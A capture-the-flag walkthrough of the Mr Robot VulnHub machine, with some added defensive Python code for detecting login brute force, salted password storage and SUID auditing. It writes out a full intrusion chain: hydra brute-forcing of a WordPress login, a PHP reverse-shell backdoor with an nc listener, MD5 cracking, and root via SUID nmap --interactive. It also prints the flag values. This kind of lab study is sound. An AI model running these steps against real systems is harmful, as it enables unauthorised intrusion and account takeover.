VM : MrRobot
Download Link : https://www.vulnhub.com/entry/basic-pentesting-2,241/
Getting Target machine IP :
Scan the whole network to identify the target IP.
nmap -sP 192.168.56.0/24
-sP performs a ping scan (ICMP echo request) and only reports whether a host is up or down. Our target system is 192.168.56.101.
Scanning the target
$ nmap -sV 192.168.56.101 -oN target.scan
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
There are only two ports open.
-oN stores the output in normal format (target.scan); various other output formats are also available.
On port 80 a web page is served, but it contains nothing interesting.
Scanning the target web server for hidden URLs and other files
$ dirb http://192.168.56.101 -o dirb.scan
It seems there is some problem with the scan (because I am running the attacker machine in a docker container), so I need to use the -w option to ignore the warning.
Scanning for a WordPress website :
$ wpscan --url http://192.168.56.101
Some of the important findings are :
http://192.168.56.101/0/
http://192.168.56.101/admin/
http://192.168.56.101/robots.txt
.......
At http://192.168.56.101/0/ a WordPress website is hosted. The robots.txt file also lists some interesting entries, so first download it.
$ wget http://192.168.56.101/robots.txt
--2019-11-13 15:52:46-- http://192.168.56.101/robots.txt
Connecting to 192.168.56.101:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 41 [text/plain]
Saving to: 'robots.txt'
robots.txt 100%[========================>] 41 --.-KB/s in 0s
2019-11-13 15:52:46 (4.69 MB/s) - 'robots.txt' saved [41/41]
$ cat robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
As we can see, we have found our first key and another file, fsocity.dic. Now download them.
$ wget http://192.168.56.101/key-1-of-3.txt
$ cat key-1-of-3.txt
1f80d943455fb30724b9
It contains the flag value. Now let's check the other file.
$ wget http://192.168.56.101/fsocity.dic
This file contains a list of 858160 words.
$ wc -l fsocity.dic
Now let's sort the file and remove duplicates.
$ cat fsocity.dic | sort | uniq > fsocity_sorted.dic
Now the file length is 11451. This list can be used as a wordlist for the WordPress login, so we try to bruteforce the login with it: first the username field, then the password field. For the bruteforce we are going to use hydra.
BruteForcing WordPress Login with Hydra :
For basics use hydra refer to this : http://www.sec-art.net/hydra
Bruteforcing username:
$ hydra -vV -L fsocity_sorted.dic -p randompass 192.168.56.101 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid username" -o success
The -o success option stores the working logins in a file. Contents of the success file :
[80][http-post-form] host: 192.168.56.101 login: ELLIOT password: randompass
[80][http-post-form] host: 192.168.56.101 login: Elliot password: randompass
[80][http-post-form] host: 192.168.56.101 login: elliot password: randompa
Now that the username is found, we can bruteforce the password field with the same list.
$ hydra -vV -l elliot -P fsocity_sorted.dic 192.168.56.101 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:incorrect"
Password found : ER28-0652
We can also use wpscan, for example :
$ wpscan --url http://192.168.56.101/wp-login.php --usernames elliot --passwords fsocity_sorted.dic --wp-content-dir "http://192.168.56.101/wp-login.php"
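From the defender's side, both the hydra and wpscan runs above leave the same footprint: a burst of POST requests to /wp-login.php from one client, answered with 200 (the login form re-rendered with the "Invalid username"/"incorrect" text hydra matches on), and finally a 302 redirect once a password works. The following detection example is added here and is not part of the original post; the Apache access-log lines it parses are constructed, and the threshold of 5 failures is an assumption.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample Apache access-log lines (not from the original post):
# one client hammering /wp-login.php, then a successful login (302 redirect),
# and an ordinary visitor for contrast.
SAMPLE_LOG = """\
192.168.56.1 - - [13/Nov/2019:15:58:01 +0000] "POST /wp-login.php HTTP/1.1" 200 2311
192.168.56.1 - - [13/Nov/2019:15:58:01 +0000] "POST /wp-login.php HTTP/1.1" 200 2311
192.168.56.1 - - [13/Nov/2019:15:58:02 +0000] "POST /wp-login.php HTTP/1.1" 200 2311
192.168.56.1 - - [13/Nov/2019:15:58:02 +0000] "POST /wp-login.php HTTP/1.1" 200 2311
192.168.56.1 - - [13/Nov/2019:15:58:03 +0000] "POST /wp-login.php HTTP/1.1" 200 2311
192.168.56.1 - - [13/Nov/2019:15:58:04 +0000] "POST /wp-login.php HTTP/1.1" 302 0
192.168.56.50 - - [13/Nov/2019:15:58:05 +0000] "GET /0/ HTTP/1.1" 200 9876
192.168.56.50 - - [13/Nov/2019:15:58:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def parse_line(line):
    """Parse one common-log-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": ip, "time": when, "method": method, "path": path, "status": int(status)}

def find_login_bruteforce(log_text, threshold=5):
    """Return {ip: (failures, span_seconds, succeeded)} for clients with at
    least `threshold` failed POSTs to /wp-login.php.  WordPress answers a bad
    login with 200 and the re-rendered form (the text hydra matched on above);
    a 302 means the login succeeded and the browser was redirected."""
    fails = defaultdict(list)
    succeeded = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["method"] != "POST" or rec["path"] != "/wp-login.php":
            continue
        if rec["status"] == 200:
            fails[rec["ip"]].append(rec["time"])
        elif rec["status"] == 302:
            succeeded.add(rec["ip"])
    report = {}
    for ip, times in fails.items():
        if len(times) >= threshold:
            span = int((max(times) - min(times)).total_seconds())
            report[ip] = (len(times), span, ip in succeeded)
    return report
```

On the sample, 192.168.56.1 is reported with 5 failures inside 2 seconds followed by a success, which is the signature worth alerting on; the ordinary visitor never appears.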
Droping Backdoor on Wordpress :
First log in to WordPress with the above credentials and go to Appearance > Editor.
Get the PHP reverse shell code from : Click here to download
Change the IP in the script to your attacker machine's IP and port number, then put it in the Main Index page.
Now start the backdoor listener
$ nc -vvlp 1234
and open the WordPress index page.
ajay@MBot:~$ nc -vvlp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 192.168.56.101 47906 received!
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
00:13:18 up 3:57, 0 users, load average: 0.00, 0.08, 0.46
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$
In the /home/robot folder we find the 2nd key file, but currently we don't have permission to open it.
$ cd home/robot
$ ls
key-2-of-3.txt
password.raw-md5
$ cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
$ whoami
daemon
But we do have permission to read the password.raw-md5 file.
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
which looks like an unsalted MD5 password hash. To crack it we can use John the Ripper (john).
$ cat passhash.txt
c3fcd3d76192e4007dfb496cca67e13b
$ john passhash.txt
But it takes time, so we can also use an online hash cracking service such as crackstation.net.
So the password is :
abcdefghijklmnopqrstuvwxyz
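Why crackstation.net answers instantly: an unsalted MD5 hash of a given password is always the same digest, so one precomputed table serves every site that stores passwords this way. The example below is added here (not code from the original post); it reproduces the lookup on the hash from password.raw-md5 against a constructed candidate list, then shows the salted, iterated storage (PBKDF2-HMAC-SHA256, an assumed choice) that defeats such tables.

```python
import hashlib
import hmac
import os

# Hash recovered from password.raw-md5 on the target (value from the post).
ROBOT_HASH = "c3fcd3d76192e4007dfb496cca67e13b"
# Constructed candidate list standing in for a wordlist.
CANDIDATES = ["password", "robot", "mrrobot", "abcdefghijklmnopqrstuvwxyz"]

def md5_hex(password):
    return hashlib.md5(password.encode()).hexdigest()

def lookup_unsalted_md5(target_hex, candidates):
    """Unsalted MD5 maps each password to one fixed digest, so a table built
    once (crackstation.net keeps a very large one) answers the query instantly."""
    table = {md5_hex(c): c for c in candidates}
    return table.get(target_hex)

def store_password(password, salt=None, rounds=200_000):
    """Salted, iterated hashing (PBKDF2-HMAC-SHA256): a random 16-byte salt per
    user makes precomputed tables useless and two users with the same password
    get different records; the round count makes each guess costly."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return f"pbkdf2${rounds}${salt.hex()}${digest.hex()}"

def verify_password(password, record):
    """Recompute the stored record from its own salt and compare in constant time."""
    _algo, rounds, salt_hex, digest_hex = record.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(digest.hex(), digest_hex)
```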
Now let's try to log in as robot with the above password.
$ sudo robot
sudo: no tty present and no askpass program specified
$ python -c 'import pty; pty.spawn("/bin/bash")'
daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$
We get the 2nd flag as well. Note that python -c 'import pty; pty.spawn("/bin/bash")' is used to spawn a tty shell, which su needs.
Privilege Escalation to root :
There are various methods for privilege escalation, which can be found here : Link (Click Here)
For this VM, first we try to find binaries that are owned by root and have the SUID bit set.
$ find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 69120 Feb 12 2015 /bin/umount
-rwsr-xr-x 1 root root 94792 Feb 12 2015 /bin/mount
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 36936 Feb 17 2014 /bin/su
-rwsr-xr-x 1 root root 47032 Feb 17 2014 /usr/bin/passwd
-rwsr-xr-x 1 root root 32464 Feb 17 2014 /usr/bin/newgrp
-rwsr-xr-x 1 root root 41336 Feb 17 2014 /usr/bin/chsh
-rwsr-xr-x 1 root root 46424 Feb 17 2014 /usr/bin/chfn
-rwsr-xr-x 1 root root 68152 Feb 17 2014 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 155008 Mar 12 2015 /usr/bin/sudo
-rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap
-rwsr-xr-x 1 root root 440416 May 12 2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10240 Feb 25 2014 /usr/lib/eject/dmcrypt-get-device
-r-sr-xr-x 1 root root 9532 Nov 13 2015 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 14320 Nov 13 2015 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 10344 Feb 25 2015 /usr/lib/pt_chown
Above we use find to locate files with the SUID bit set (-perm -4000) owned by root; the -exec option runs ls -ld on each file, and 2>/dev/null discards the permission errors.
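The same listing is what an administrator should compare against a known-good baseline: a SUID-root nmap under /usr/local/bin should stand out immediately. The audit below is added here (not code from the original post); the baseline set is an assumed stock Ubuntu 14.04 list and the sample input is an excerpt of the find output above.

```python
import re

# Example baseline of SUID-root binaries expected on a stock Ubuntu 14.04 host
# (an assumption for illustration; build a real one from a clean install).
BASELINE = {
    "/bin/ping", "/bin/ping6", "/bin/su", "/bin/mount", "/bin/umount",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/pt_chown",
}
# Locations where a SUID-root file is a finding even if someone "expects" it.
RISKY_PREFIXES = ("/usr/local/", "/tmp/", "/var/tmp/", "/home/", "/dev/shm/")

# Excerpt of the find / ls -ld output shown above, used as sample input.
SAMPLE = [
    "-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping",
    "-rwsr-xr-x 1 root root 36936 Feb 17 2014 /bin/su",
    "-rwsr-xr-x 1 root root 155008 Mar 12 2015 /usr/bin/sudo",
    "-rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap",
    "-r-sr-xr-x 1 root root 9532 Nov 13 2015 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper",
    "-rwsr-xr-x 1 root root 10344 Feb 25 2015 /usr/lib/pt_chown",
]

LS_RE = re.compile(r"^(\S{10})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\d+\s+\S+\s+(\S.*)$")

def parse_ls_line(line):
    """Parse one 'ls -ld' line into (mode, owner, path); None if it does not match."""
    m = LS_RE.match(line.strip())
    if not m:
        return None
    mode, owner, _group, path = m.groups()
    return mode, owner, path

def audit_suid(ls_lines, baseline=BASELINE):
    """Return paths that are SUID root and either absent from the baseline or
    sitting under a risky prefix; the nmap copy in /usr/local/bin trips both."""
    findings = []
    for line in ls_lines:
        parsed = parse_ls_line(line)
        if not parsed:
            continue
        mode, owner, path = parsed
        if owner != "root" or mode[3] not in "sS":
            continue  # not a SUID-root file: 's'/'S' in the owner-execute slot
        if path not in baseline or path.startswith(RISKY_PREFIXES):
            findings.append(path)
    return findings
```

The vmware-tools wrapper is also reported because the assumed baseline does not list it, which is the point of a baseline: it must reflect the packages actually installed on the host, and every remaining finding deserves an explanation.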
Now there is an interesting finding :
-rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap
There is a method to get a root shell with nmap (if it supports the --interactive option), which is described in this article : https://www.exploit-db.com/papers/18168/
Now get a root shell with nmap
$ nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# whoami
whoami
root
#
We get a root shell! Now let's find the 3rd key.
# cd /root
cd /root
# ls
ls
firstboot_done key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
That's it! We found all the keys.